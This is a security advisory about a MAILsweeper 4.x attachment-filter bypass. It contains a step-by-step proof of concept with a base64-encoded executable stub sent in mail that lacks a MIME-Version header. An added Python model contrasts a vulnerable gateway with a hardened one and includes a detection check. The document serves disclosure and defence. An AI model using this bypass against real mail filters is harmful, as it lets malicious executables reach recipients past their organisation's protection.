Reported March 3, 2003, by Martin O’Neal.

 

 

VERSIONS AFFECTED

 

  • Clearswift MAILsweeper 4.x for Windows NT/2000

 

DESCRIPTION

 

A vulnerability exists in Clearswift MAILsweeper 4.x that allows the attachment blocking feature to be bypassed on a vulnerable server. If a deliberately malformed MIME encapsulation is used, MAILsweeper does not recognize the attachment and allows it to pass, while a receiving client that tolerates the malformed structure (the discoverer names Microsoft Internet Explorer) still decodes and presents the attachment.

 

DEMONSTRATION

 

The discoverer posted the following steps as proof of concept:

 

-- Proof of concept --

For this proof of concept, the MIME encapsulation is simply modified to remove the MIME-Version header field. An example of an application that will process a MIME construct that is malformed in this way is Microsoft Internet Explorer.

Whilst RFC2045 states that all agents must include this field [2], it then goes on to say that "In the absence of a MIME-Version field, a receiving mail user agent (whether conforming to MIME requirements or not) may optionally choose to interpret the body of the message according to local conventions."

Step 1: On the MAILsweeper host create a new Data Type Manager with only the Executable type selected. Save and restart the MAILsweeper Security service.

Step 2: Now create a text file that will be used to hold the MIME encoded attachment. Start notepad (or another text editor), and paste in:

    MIME-Version: 1.0
    Content-Location:file:///executable.exe
    Content-Transfer-Encoding: base64

    TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/
    /////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB
    gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw
    C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz
    YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ
    Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD
    h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf
    oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs
    2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC
    ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY
    29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAA=

Step 3: To reproduce this issue, send an email containing the attachment created in step 2 that will be processed by the scenario from step 1. This should result in a successful discovery condition.

Step 4: Reopen the attachment from step 2 and remove the first line (MIME-Version: 1.0), then resend the attachment as per step 3. This should result in the attachment not being spotted as an executable.
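The following Python script is an added example and is not code from the advisory or from Clearswift. It models the four steps above: it builds the step 2 header layout (MIME-Version, Content-Location, Content-Transfer-Encoding, base64 body) with and without the first header, uses the standard library's email package as a stand-in for a lenient receiving client (RFC 2045 lets a receiver interpret a MIME-Version-less body "according to local conventions"), and contrasts a gateway that only decodes bodies it recognises as MIME with one that decodes on the same terms as the client and also flags the malformed header block, which is the condition the vendor's detection script looks for. The payload is a constructed 32-byte MZ stub, not the executable from the advisory; the addresses and the list of MIME-only headers are the example's own assumptions.

```python
"""Model of the MAILsweeper MIME-Version bypass and of the workaround check.

Added example; not code from the advisory or from Clearswift. The email
package stands in for a lenient receiving client, and two functions stand
in for a gateway that requires MIME-Version before decoding and for one
that does not.
"""
import base64
import email
from email import policy

# Constructed sample payload: 32 bytes beginning with the DOS "MZ" magic.
# It is not the executable from the advisory and does nothing if run.
SAMPLE_EXE = b"MZ\x90\x00" + b"\x00" * 28

# Headers that only make sense for a MIME body (assumed list, RFC 2045/2557).
# Their presence without MIME-Version is the malformation the advisory uses.
MIME_ONLY_HEADERS = (
    "Content-Type",
    "Content-Transfer-Encoding",
    "Content-Disposition",
    "Content-ID",
    "Content-Location",
)


def build_message(include_mime_version: bool) -> bytes:
    """Build a message laid out like the advisory's step 2 file, with or
    without the MIME-Version line. Addresses are placeholders."""
    headers = ["MIME-Version: 1.0"] if include_mime_version else []
    headers += [
        "From: sender@example.invalid",
        "To: recipient@example.invalid",
        "Subject: test",
        "Content-Location: file:///executable.exe",
        "Content-Transfer-Encoding: base64",
    ]
    body = base64.encodebytes(SAMPLE_EXE).decode("ascii").replace("\n", "\r\n")
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("ascii")


def is_executable(data: bytes) -> bool:
    """Stand-in for a Data Type Manager 'Executable' type: DOS/PE magic."""
    return data[:2] == b"MZ"


def decoded_parts(raw: bytes) -> list:
    """Decode every leaf part the way a lenient client does: honour
    Content-Transfer-Encoding whether or not MIME-Version is present."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [
        part.get_payload(decode=True) or b""
        for part in msg.walk()
        if not part.is_multipart()
    ]


def missing_mime_version(raw: bytes) -> bool:
    """Workaround check: MIME-only headers present but MIME-Version absent."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if msg["MIME-Version"] is not None:
        return False
    return any(msg[h] is not None for h in MIME_ONLY_HEADERS)


def gateway_requires_mime_version(raw: bytes) -> str:
    """Vulnerable behaviour: treat the body as MIME only if MIME-Version is
    present, otherwise pass it through as opaque text. Returns 'block'/'pass'."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if msg["MIME-Version"] is None:
        return "pass"  # body never decoded, so the executable is never seen
    return "block" if any(is_executable(p) for p in decoded_parts(raw)) else "pass"


def gateway_hardened(raw: bytes) -> str:
    """Fixed behaviour: decode on the same terms as the receiving client, and
    block the malformed header block itself even before content inspection."""
    if missing_mime_version(raw):
        return "block"
    return "block" if any(is_executable(p) for p in decoded_parts(raw)) else "pass"


if __name__ == "__main__":
    for with_version in (True, False):
        raw = build_message(with_version)
        print(
            f"MIME-Version present={with_version!s:5} "
            f"vulnerable={gateway_requires_mime_version(raw):5} "
            f"hardened={gateway_hardened(raw):5} "
            f"client decodes MZ={is_executable(decoded_parts(raw)[0])}"
        )
```

The point the script makes is that the gateway and the client disagree about what the message is: the client decodes the base64 body regardless of MIME-Version, so any filter that gates decoding on that header inspects a different object from the one the user receives. Parsing as leniently as the weakest downstream consumer, and treating the inconsistent header block as a block condition in its own right, closes both gaps.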

 

VENDOR RESPONSE

 

The vendor, <a href="http://www.clearswift.com/">Clearswift</a>, has made an <a href="http://www.clearswift.com/support/threatlab/vbstool.asp">updated script utility</a> available that detects the malformed MIME header used in this vulnerability. Until a fix or patch is available, this should be implemented as a workaround.

 

 

CREDIT

Discovered by Martin O'Neal.